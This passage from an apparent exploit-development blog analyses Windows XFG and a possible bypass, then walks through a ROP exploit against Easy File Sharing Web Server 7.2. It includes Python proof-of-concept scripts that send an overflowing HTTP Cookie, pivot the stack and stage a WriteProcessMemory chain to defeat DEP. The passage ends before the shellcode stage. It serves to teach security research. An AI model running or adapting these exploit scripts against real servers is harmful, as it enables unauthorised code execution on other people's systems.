This time, when the __guard_xfg_dispatch_icall_fptr function is dereferenced, a jump to the function ntdll!LdrpDispatchUserCallTargetXFG is performed.

Firstly, a bitwise OR of the XFG hash and 1 occurs, with the result placed in R10. In our case, this sets a bit in the XFG function hash.

Next, a test al, 0xf operation occurs, which performs a bitwise AND between the lower 8 bits of AX (AL) and 0xf.

As we can see from the image above, this sets the zero flag in our case. Additionally, now we have reached a possible jump within ntdll!LdrpDispatchUserCallTargetXFG

Since the zero flag has been set, we will NOT take the jump and instead move on to the next instruction, test ax, 0xFFF.

Stepping through test ax, 0xFFF, which will perform a bitwise AND with the lower 16 bits of EAX and 0xFFF, plus set the zero flag accordingly, we see that we have cleared the zero flag in the image below. This means the jump will not occur, and we continue to move deeper into the ntdll!LdrpDispatchUserCallTargetXFG function.

Finally, we land on the cmp instruction which compares the hash 8 bytes above RAX (our target function) with the hash preserved in R10.

The compare statement, because the values are equal, causes the zero flag to be set. This skips the next jump, and performs the final jump to our target function in RAX!

This is how a function protected by XFG is checked! Let’s now edit our code a bit and explore XFG a bit more.

Let’s Keep Going!

Recall that an XFG hash is made up of a function’s return type and any parameters. Let’s update our code to invoke another function of a different type.

We have changed the protectMe2() function to a function that returns an integer and takes a parameter of the type integer. This is different than our void cfgTest() function. We also set a function pointer, int (*cfgTest2) equal to the int protectMe2() function in order to create a new XFG hash for a different function type (int in this case). Let’s recompile our program and disassemble it in IDA to see how the two functions may vary from an XFG perspective.

Very interesting! As we can see from the above image, there are two different hashes now. The hash for our original function has remained the same. However, the hash for the int protectMe2() function is very different, but the last 12 bits of each hash in hexadecimal is 870 in our case. This interesting and may be worth noting.

Additionally, static and dynamic analysis both show that even before any code has executed, the actual hash that is placed 8 bytes above each function. Additionally, the hashes already have an additional bit set, just as we saw last time.

Let’s take this opportunity to showcase why XFG is significantly stronger than CFG.

Let’s simulate an arbitrary write again by overwriting what Source!cfgTest1 points to with Source!protectMe2.

After simulating the arbitrary write, we pick up execution in ntdll!LdrpDispatchUserCallTargetXFG again. Stepping through a few instructions, we once again land on the cmp instruction which checks to see if the preserved XFG hash matches the current XFG hash.

As we can see below, the hashes do not match!

Since the hashes do not match, this will cause XFG to determine a function pointer has been overwritten with something it should not have been overwritten with- and causes a program crash. Even though the function pointer was overwritten by another function within the same bitmap- XFG still will crash the process.

Let’s examine another scenario, with two functions of the same return type- but not the same amount of parameters.

To achieve this, our code has been edited to the following.

As we can see from the above image, we are using all integer functions now. However, the int cfgTest() function has two more parameters than the int protectMe2() function. Let’s compile and perform some static analysis in IDA.

The only difference between the two functions protected by XFG is the amount of parameters that int cfgTest() has, and yet the hashes are TOTALLY different. From a defensive perspective, it seems like even very similar functions are viewed as “very different”.

Additionally, we notice that the last 12 bits of the int cfgTest() hash have become 371 in hexadecimal instead of the previously mentioned 871 value. This means that XFG hashes seem to be unique until the last 8 bits. This is indicative of the hash only being unique up until about 56 bits.

As a sanity check and for completness sake, let’s see what happens when two identical functions are assigned an XFG hash.

OMG Samesies!

Here is an edited version of our code, with two identical functions.

Disassembling the functions in IDA, we can see that the hashes this time are identical.

Obviously, since the hashing process for an XFG hash takes a function prototype and hashes it, the two hashes are going to be the same. I would not call this a flaw at all, because it is obvious Microsoft knew to this going in. However, I feel this is a nice win for Microsoft in terms of their overall CFI strategy because as David pointed out, this was very little overhead to the already existing CFG infrastructure.

However, from an adversarial standpoint- it must be said. XFG functions can be overwritten, so long as the function is basically an identical prototype of the original function.

Potential Bypasses?

As mentioned above, utilizing functions of identical prototypes generates identical XFG hashes. Knowing this, it seems as though it could be possible to overwrite a function with an identical function of the same prototype. This is SIGNIFICANTLY stronger than CFG in terms of what functions can actually be called.

Let’s talk about one more (potential) additional potential bypass.

As we know, functions protected by XFG have an XFG hash placed above them (8 bytes above to be more specific). What would happen for instance, if we performed a function pointer overwrite and called into the middle of a function, like KERNELBASE!VirtualProtect.

As we can see from the above image, calling into the middle of this function shows us that these hex numbers are being interpreted as opcodes, not memory addresses. This means that if XFG checks if a function pointer is overwritten by KERNELBASE!VirtualProtect, it would load the address of this function into RAX per the usual routine for XFG/CFG function checks. Then, this address is dereferenced at an offset of negative 8 to perform the XFG check. When this dereference happens, since this address contains opcodes, the opcodes that are present when calling into the middle of the function will be used in the XFG check.

Let’s perform a function pointer overwrite.

Note that the machine was restarted in between screenshots, causing addresses to change (but the symbols will remain the same).

Next, let’s step through the XFG dispatch functions and reach the compare statememt.

Hitting the compare statement, we can see that R10 contains the preserved XFG hash, while RAX just contains the address of KERNELBASE!VirtualProtect + 0x50.

Taking a look at RAX - 8, where the XFG check occurs, we can see that the opcodes that reside within KERNELBASE!VirutalProtect are being treated as the “compared hash”.

Although this compare will fail, this brings up an interesting point.

Since calling into a middle of a function results in the function’s data being treated as opcodes and not memory addresses (usually), it may be possible for an adversary to utilize an arbitrary read/write primitive to do the following.

  1. Locate the XFG hash for a function you want to overwrite
  2. Perform a loop to dereference the process space’s memory and look for patterns that are identical to the XFG hash (remember, we still have to abide by CFG’s rules and choosing a function exported by the application or a function that is additionally located in the same bitmap)
  3. Overwrite the function pointer with any viable candidates

Although you most likely are going to be very hard pressed to find anything identical to the hash in terms of opcodes in the middle of a function AND additionally make whatever you find useful from an attacker’s perspective, this is still possible it seems.

Final Thoughts

I think personally that XFG is an awesome mitigation and I am excited to see how people get creative with the solution. However, until CET comes into play, overwriting return addresses on the stack seems like it will still be fair game. I think the combination of XFG and CET is going to be very interesting for exploitation in the future. I think XFG is a great and pretty creative mitigation. However, it has yet to be seen yet how it performs against Indirect Branch Tracking (IBT), which is CET’s forward-edge protection. All together, I think Microsoft has done a great thing with XFG by implementing it and not letting all of the work done with CFG go to waste.

As always! Peace, love, and positivity :-)

The Current State of Exploit Development, Part 2

20 August 2020 at 00:00

CrowdStrike Blog

Today I am very happy to have released my second blog for CrowdStrike! This blog, which builds off of my last one, talks about some additional mitigations like ACG, XFG, and VBS/HVCI which have made exploitation more expensive and time consuming. This blog rounds out the series and I hope you have found it useful! I learned a lot when I put this two part series together.

You can find the blog here. Enjoy!

The Current State of Exploit Development, Part 1

6 August 2020 at 00:00

CrowdStrike Blog

As you may or may not know, I work at CrowdStrike for my day job. I am also apart of the red team and do not do any official exploit development/vulnerability research. I wanted to address why binary exploits often aren’t as used anymore in typical red team toolkits and explain although the impact of a binary exploit, especially in the kernel, is far more effective than typical red team TTPs- is the return on investment worth it? I would love to see, personally, some red team research shift towards kernel exploits for local privilege escalation- which is often one of the more difficult parts of a penetration tests. But is binary exploitation even worth it at this point for red team work? Let’s find out!

Enjoy! Part 1

Exploit Development: Playing ROP’em COP’em Robots with WriteProcessMemory()

11 July 2020 at 00:00

Introduction

The other day on Twitter, I received a very kind and flattering message about a previous post of mine on the topic of ROP. Thinking about this post, I recall utilizing VirtualProtect() and disabling ASLR system wide to bypass DEP. I also used an outdated debugger, Immunity Debugger at the time, and I wanted to expand on my previous work, with a little bit of a less documented ROP technique and WinDbg.

Why is ROP Important?

ROP/COP and other code reuse apparatuses are very important mitigation bypass techniques, due to their versatility. Binary exploit mitigations have come a long way since DEP. Notably, mitigations such as CFG, upcoming XFG, ACG, etc. have posed an increased threat to exploit writers as time has gone on. ROP still has been the “swiss army knife” to keep binary exploits alive. ROP can result in arbitrary write and arbitrary read primitives- as we will see in the upcoming post. Additionally, data only attacks with the implementation of ACG have become crucial. It is possible to perform data only attacks, although expensive from a technical perspective, by writing payloads fully in ROP.

What This Blog Assumes and What This Blog ISN’T

If you are interested in a remote bypass of ASLR and a 64-bit version of bypassing DEP, I suggest reading a previous blog of mine on this topic (although, undoubtedly, there are better blogs on this subject).

This blog will not address ASLR or 64-bit exploitation (read my previous post if that is what you are looking for)- and will be utilizing non-ASLR compiled modules, as well as the x86 __stdcall calling convention (technically an “ASLR bypass”, but in my opinion only an information leak = true ASLR bypasses).

Why are these topics not being addressed? This post aims to focus on a different, less documented approach to executing code with ROP. As such, I find it useful to use the most basic, straightforward example to hopefully help the reader fully understand a concept. I am fully aware that it is 2020 and I am well aware mitigations such as CFG are more common. However, generally the last step in exploitation, no matter HOW many mitigations there are (unless you are performing a data only attack), is bypassing DEP (in user mode or kernel mode). This post aims to address the latter portion of the last sentiment- and expects the reader already has an ASLR bypass primitive and a way to pivot to the stack.

Expediting The Process

The application we will be going after is Easy File Sharing Web Server 7.2, which has a memory corruption vulnerability as a result of an HTTP request.

The offset to SEH is 2563 bytes. Instead of using a pop <reg> pop <reg> ret sequence, as is normally done on a 32-bit SEH exploit, an add esp, <bytes> instruction is used. This will take the stack, where it is currently not controlled by us, and change the address to an address on the stack that we control- and then return into it.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain
crash += struct.pack('<L', 0x90909090)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only- no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)		# add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Set a breakpoint on the stack pivot of add esp, 0x1004 ; ret with the WinDbg command bp 0x10022869. After sending the exploit PoC- we will need to view the contents of the exception handler with the WinDbg command !exchain.

As a breakpoint has already been set on the address inside of SEH, all that is needed to pass the exception is resuming execution with the g command in WinDbg. The breakpoint is hit, and we will step through the instruction of add esp, 0x1004 (t in WinDbg) to take control of the stack.

As a point of contention, we have about 980 bytes to work with.

The Call to WriteProcessMemory()

What is the goal of this method of bypassing DEP? The goal here is to not to dynamically change permissions of memory to make it executable- but to instead write our shellcode, dynamically, to already executable memory.

As we know, when DEP is enabled, memory is either writable or executable- but not both at the same time. The previous sentiment about writing shellcode, via WriteProcessMemory(), to executable memory is a bit contradictory knowing this. If memory is executable, adhering to DEP’s rules, it shouldn’t be writable. WriteProcessMemory() overcomes this by temporarily marking memory pages as RWX while data is being written to a destination- even if that destination doesn’t have writable permissions. After the write succeeds, the memory is then marked again as execute only.

From an adversary’s perspective, this means something. Certain shellcodes employ encoding mechanisms to bypass character filtering. If this is the case, encoded shellcode which is dynamically written to execute only memory will fail when executed. This is due to the encoded shellcode needing to “write itself” over adjacent process memory to decode. Since pages are execute only, and we do not have the WriteProcessMemory() “pass” to write to execute only memory anymore, an access violation will occur. Something to definitely keep in mind.

Let’s take a look at the call to WriteProcessMemory() firstly, to help make sense of all of this (per Microsoft Docs)

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

Let’s break down the call to WriteProcessMemory() by taking a look at each function argument.

  1. HANDLE hProcess: According to Microsoft Docs, this parameter is a handle to the desired process in which a user wants to write to the process memory. A handle, without going too much into detail, is a “reference” or “index” to an object. Generally, a handle is used as a “proxy” of sorts to access an object (this is especially true in kernel mode, as user mode cannot directly access kernel mode objects). We will look at how to dynamically resolve this parameter with relative ease. Think of this as “don’t talk to me, talk to my assistant”, where the process is the “me” and the handle is the “assistant”.
  2. LPVOID lpBaseAddress: This parameter is a pointer to the base address in which a write is desired. For example, if the region of memory you would like to write to was 0x11223344 - 0x11223355, the argument passed to the function call would be 0x11223344.
  3. LPCVOID lpBuffer: This is a pointer to the buffer that is to be written to the address specified by the lpBaseAddress parameter. This will be the pointer to our shellcode.
  4. SIZE_T nSize: The number of bytes to be written (whatever the size of the shellcode + NOPs, if necessary, will be).
  5. SIZE_T *lpNumberOfBytesWritten: This parameter is similar to the VirtualProtect() parameter lpflOldProtect, which inherits the old permissions of modified memory. However, our parameter inherits the number of bytes written. This will need to be a memory address, within the process space, that is writable.

Preserving a Stack Address

One of the pitfalls of ROP is that stack control is absolutely vital. Why? It is logical actually- each ROP gadget is appended with a ret instruction. ret, from a technical perspective, will take the value pointed to by RSP (or ESP in this case), which will be the next ROP gadget on the stack, and load it into RIP (EIP in this case). Since ROP must be performed on the stack, and due to the dynamic nature of the stack, the virtual memory addresses associated with the stack are also dynamic.

As seen below, when the stack pivot is successfully performed, the virtual address of the stack is 0x029a68dc.

Restarting the application and pivoting to the stack again, the virtual address of the stack is at 0x028068dc.

At first glance, this puts us in a difficult position. Even with knowledge of the base addresses of each module, and their static nature- the stack still seems to change! Although the stack is dynamically being resolved to seemingly “random” and “volatile to the duration of the process” memory- there is a way around this. If we can use a ROP gadget, or set of gadgets, properly- we can dynamically store an address around the stack into a CPU register.

Let’s start our ROP chain by preserving an address near the current stack pointer.

As you may or may not know, the base pointer (EBP) points to the “bottom” of the current stack frame (we will refer to the current stack frame as “the stack”). This means that EBP should be relatively close to ESP. We can validate this in WinDbg by viewing the current state of the CPU registers after the stack pivot.

After parsing the PE with rp++, to enumerate a list of ROP gadgets (you can view how to use rp++ by taking a look at my last ROP blog post)- a nice gadget resides in sqlite3.dll that can help us preserve the address of EBP into another “common” register, which has more useful ROP gadgets as we will see later on, such as EAX.

0x61c05e8c: xchg eax, ebp ; ret  ;  (1 found)

Replace the NOPs in the previous PoC script, under the “Begin ROP chain” comment, with the above address. After firing off the updated PoC, we land on our intended ROP gadget.

After executing the above gadget, EAX is now loaded with an address near the current stack.

Notice that EBP has also been set to 0, due to the ROP gadget. This will come into play shortly.

Although EAX is relatively close to ESP- it is still a decent ways away. Currently, EAX (which now contains the old value of EBP) is 0xfec bytes away from ESP.

To compensate for this, we will manipulate EAX to contain the address at ESP + 0x38.

Why ESP + 0x38 instead of just ESP you ask? This is a “preparatory” procedure (manipulating EAX to contain the address of ESP + 0x38).

As we will see later on, we would like to preserve an address around ESP into another “common” register, ECX. ECX is a register that is used as a “counter” (although technically it is a general purpose register). This means that ECX generally is a part of some more useful ROP gadgets.

In order to do this, the stack will eventually need to be increased by 0x24 bytes to get the value (technically future value) of ESP into ECX, due to the nature of the ROP gadgets available within the process memory. A ROP gadget will inadvertently perform an add esp, 0x24, resulting in collateral damage to get what we need accompilshed, accomplished. There will be 4 ROP gadgets (plus an additional DWORD that will be “popped” into a register), for a total of 0x14 (20 decimal) bytes, that will need to be executed between now and when that add esp, 0x24 gadget is executed (0x38 - 0x24 = 0x14).

This is reason why we will set EAX to the value of ESP + 0x38 instead of ESP + 0x24, because we will need 0x14 bytes worth of ROP gadgets between then and now. By the time the ROP gadgets before the add esp, 0x24 instruction are executed, the value in EAX will be ESP + 0x24. However, if we loaded ESP + 0x24 into EAX now, then by the time we reach the add esp, 0x24 instruction, EAX will contain a value of ESP + 0x10.

Knowing this, and knowing that we would like EAX and ECX to be equal to the current value of ESP after the ESP + 0x38 stack manipulation occurs- we will prepare EAX in advance.

Note that this is by no means a requirement (getting EAX and ECX set to the EXACT value of ESP) when doing ROP. This will just make life easier in the future. If this doesn’t make sense now, do not worry. Just focus on the fact we would like to get EAX closer to ESP for the time being.

0x10018606: pop ecx ; ret  ;  (1 found)
0xffffefe0 (Value to be popped into EAX. This is the negative representation of the distance between the current value of EAX and ESP + 0x38). 
0x1001283e: sub eax, ecx ; ret  ;  (1 found)

Why the negative distance you ask? Let’s say we wanted to add 0x1024 to EAX. If we loaded 0x1024 into ECX, to add it to EAX, ECX would contain 0x00001024. As we can clearly see, ECX will contain NULL bytes- which will kill our exploit. Instead, we will use the negative representation of numbers and perform subtraction in order to get around this problem.

After the aformentioned gadget of exchanging EBP and EAX, program execution hits the pop ecx gadget.

The negative value of the distance between EAX and ESP + 0x38 is placed into ECX.

Program execution then transfers to the sub eax, ecx ROP gadget, which will place the difference into the EAX register.

This yields our desired result.

Note that 0xCCCCCCCC is denoted as a visual for where we hope our program execution resumes at after all of this craziness. Our goal is for when the last ret occurs, it returns into this DWORD.

The goal now is to get the current value of EAX into ECX. There is a nice ROP gadget that will do this for us.

0x61c6588d: mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave  ; ret  ;  (1 found)

This gadget will take EAX and place it into ECX. Then, a mov eax, ecx instruction will occur- which is meaningless because ECX and EAX already contain the same value- meaning this part of the gadget basically just serves as a “NOP” of sorts. ESP then gets raised by 0x24 bytes, which we can compensate for- so this isn’t an issue. pop ebx can be compensated for as well, but leave will be a problem as this will directly manipulate ESP, throwing our ROP execution flow off.

leave, from a technical perspective, will perform a mov esp, ebp and a pop ebp instruction.

mov esp, ebp will place EBP into ESP. Let’s think about how we can leverage this.

We know that currently EAX contains our target address. We also can recall from earlier that EBP is currently set to 0. If we could place EAX into EBP BEFORE the leave instruction executes- it would set ESP to ESP + 0x24 (at the time of the instruction executing) because of the mov esp, ebp instruction- which sets ESP to whatever EBP is. Due to the add esp, 0x24 gadget that occurs before the leave instruction- this would actually end up setting ESP to ESP, which is what we want. The goal here is to restore ESP back to our controlled data, which consists of our ROP gadgets.

It is a bit of a moutful and “mind bender” of sorts- so do not worry if it is hazy or confusing at the moment. Viewing this step by step in the debugger will help make sense of all of this.

Note, after each gadget- obviously the value of ESP changes. For completness sake, until we hit the add esp, 0x24 gadget- we will refer to the “target” ESP + 0x38 address as ESP + 0x38 (even though the offset will technically shrink after each gadget is executed).

First, as mentioned above, we need to get the value in EAX into EBP to prepare for the leave instruction.

0x61c30547: add ebp, eax ; ret  ;  (1 found)

How does adding EAX to EBP place EAX into EBP? Recall that EBP is set to 0 and EAX contains the memory address of ESP + 0x38. That address of ESP + 0x38 will get added to the number 0, which doesn’t alter it in any way, and the result of the addition is placed into EBP- essentially “moving” the address into EBP.

Let’s step through all of this in WinDbg- to make things a bit more clear.

First, program execution reaches the add ebp, eax instruction.

EBP currently is set to 0 and EAX is set to ESP + 0x38

Stepping through the instruction yields the desired result of placing ESP + 0x38 into EBP.

After EBP is prepared, program execution reaches the next ROP gadget.

After stepping through the mov ecx, eax gadget- ECX and EAX are now both set to ESP + 0x38.

Stepping through the mov eax, ecx instruction doesn’t affect the EAX or ECX registers at all, as ECX (which is already equal to EAX) is placed into EAX.

Taking a look on the stack now, we can see our compensation for add esp, 0x24 and pop ebx between the address before 0xCCCCCCCC

Program executing has also reached the add esp, 0x24 instruction.

Stepping through the instruction, the stack as been set to the same values in EAX, ECX, and EBP.

Then, pop ebx clears the last bit of “padding” on the stack.

After all of this has occured, the leave instruction is loaded up for execution.

leave ; ret is executed, and the execution of our ROP chain resumes its course- all while preserving ESP into ECX and EAX!

WriteProcessMemory() Parameters

Recall that we are dealing with the x86 architecture, meaning function calls go through __stdcall instead of __fastcall. This means that instead of placing our function arguments into RCX, RDX, R8, R9, RSP + 0x20, and so on- we can just simply place our parameters on the stack, as such.

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)		# Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)		# Return address parameter placeholder (where function will jump to after execution- which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)		# hProccess = handle to current process (Psuedo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)		# lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cade in the .text seciton of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)		# lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)		# nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)		# lpNumberOfBytesWritten = writeable location (.idata section of ImageLoad.dll address in a code cave)

Let’s talk about where these parameters come from.

To “bypass” Windows’ ASLR (the OS DLLs still use ASLR, even if this application doesn’t)- we can leverage the Import Address Table (IAT).

Whenever a program calls a Windows API function- it does not do so directly. A special table, within the process space, known as the IAT essentially contains pointers to each needed API function.

The IAT for this application is located at the .exe base + 0x166000 and it is 0xC40 bytes in size.

As is seen in the image above, the IAT just contains pointers to Windows API functions. Meaning each of these functions points to a Windows API function.

We have “the base address” of each module (in reality, each module is just not compiled with ASLR)- so that is no problem. However, the value that each of these functions points to (which is a Windows API function) will change upon reboot.

The way to get around this, would be to load one of these IAT entries into a register we control (such as ECX) and then peform a mov ecx, dword ptr [ecx] instruction- an arbitrary read.

This would extract whatever ECX points to (which is a Windows API function) and place it into ECX. Even though Windows will randomize the addresses of the API, we can still leverage the fact each IAT will always point to the same Windows API function (even if the address of the API changes) to make sure this is not a problem.

Although the IAT for this application doesn’t directly contain a function pointer to kernel32WriteProcessMemory- it does contain pointers to other kernel32.dll pointers, such as kernel32!WriteFileImplementation. We also know that the distance between each function with a DLL DOESN’T CHANGE. This means, the distance between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory will always remain the same for the current patch level and OS version.

This gives us a primitive to dynamically resolve the location of kernel32!WriteProcessMemory.

crash += struct.pack('<L', 0x61c72530)		# Return address parameter placeholder (where function will jump to after execution- which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)

The next “parameter” is not really even a parameter at all. Similarily to my last ROP post, this will be used as the address in which program execution will transfer to AFTER the call to kernel32!WriteProcessMemory is made. This will also be the same address as our shellcode.

Why 0x61c72530 specifically?

sqlite3.dll is a module of the application- meaning it is a part of process memory. Since this DLL is required for the application to work, we can target it as a place to write our shellcode. With this method of ROP, we need to find an executable portion of memory within the application and its modules. Then, using the call to kernel32!WriteProcessMemory- we will write our shellcode to this executable portion of memory. Using the command !dh sqlite3 in WinDbg, we can determine the .text section of the portable executable has execute permissions. Also recall that even without write permissions, we can still write our shellcode if we “proxy” the write through the API call.

Viewing the .text section address- we can see that the address chosen is just an executable “code cave” that is not initialized to any memory- meaning that if we corrupt this memory, the program shouldn’t care.

This means, after the function call is completed and our shellcode is written here- program execution will transfer to this address.

crash += struct.pack('<L', 0xFFFFFFFF)		# hProccess = handle to current process (Psuedo handle = 0xFFFFFFFF points to current process)

The handle parameter is quite easy to fill- we can even use a static value. According to Microsoft Docs, GetCurrentProcess() returns a handle to the current process. More specifically, it returns a “psuedo handle” to the current process. A psuedo handle, denoted by -1 or 0xFFFFFFFF, is “special” constant that refers to a handle to the current process. This means, whenever a Windows API function requests a handle (generally in user mode), passing 0xFFFFFFFF will tell the API in question to utilize a handle to the current process. Since we would like to write our shellcode to memory within the process space- passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we would like to write the memory to virtual memory within the current process space.

crash += struct.pack('<L', 0x61c72530)		# lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cade in the .text seciton of sqlite3.dll) 

lpBaseAddress will be the address of our shellcode, as already outlined by the “return” parameter.

crash += struct.pack('<L', 0x11111111)		# lpBuffer = base address of shellcode (dynamically generated)

lpBuffer will be a pointer to our shellcode (which will first need to be written to the stack). We will dynamically resolve this with ROP gadgets.

crash += struct.pack('<L', 0x22222222)		# nSize = size of shellcode 

nSize will be the size of our shellcode.

crash += struct.pack('<L', 0x1004D740)		# lpNumberOfBytesWritten = writeable location (.idata section of ImageLoad.dll address in a code cave)

Lastly, lpNumberofBytesWrittne will be any writable address.

Let’s ROP v2!

We will be using what some have dubbed the “pointer” method of ROP (when it comes to x86 at least), where we will place these parameter “placeholders” on the stack and then dynamically change what these parameters point to in order to make a successful function call. Here is the PoC we will be using.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)		# xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP- which will compensate for ROP gadget which moves EAX into EAX vai "leave")
crash += struct.pack('<L', 0x10018606)		# pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)		# Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)		# sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)		# add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)		# mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)		# add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)		# Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)		# Return address parameter placeholder (where function will jump to after execution- which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)		# hProccess = handle to current process (Psuedo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)		# lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cade in the .text seciton of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)		# lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)		# nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)		# lpNumberOfBytesWritten = writeable location (.idata section of ImageLoad.dll address in a code cave)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only- no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)		# add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

The above PoC places the parameters on the stack and also performs a “jump” over them with add esp, 0x1C. Let’s examine this in the debugger.

The following is the state of the stack- with the kernel32!WriteProcessMemory parameters outlined in red.

The address 0x10015eb4 is a ROP gadget that will add to ESP. After this gadget is executed, we can see the stack moves further down.

We can see that we have moved further into our buffer, where our future ROP gadgets will reside. The parameters for the function call are now “behind” where program execution is- meaning we will not inadvertently corrupt these parameters because they are not within the current execution flow.

Now that this is out of the way- we can “officially” begin our ROP chain to obtain code execution.

lpBuffer

The first thing that we will do is get the lpBuffer parameter, which will contain the pointer to the base of our shellcode, situated. Recall that kernel32!WriteProcessMemory will take in a source buffer and write it somewhere else. Since we have control of the stack, we will just preemptively place our shellcode there. This is where the headache of storing an address near the stack in EAX and ECX will come into play.

As it currently stands, ECX is 0x18 bytes behind the parameter placeholder for lpBuffer.

The goal right now is to increase ECX by 0x18 bytes. Here is the reason for this.

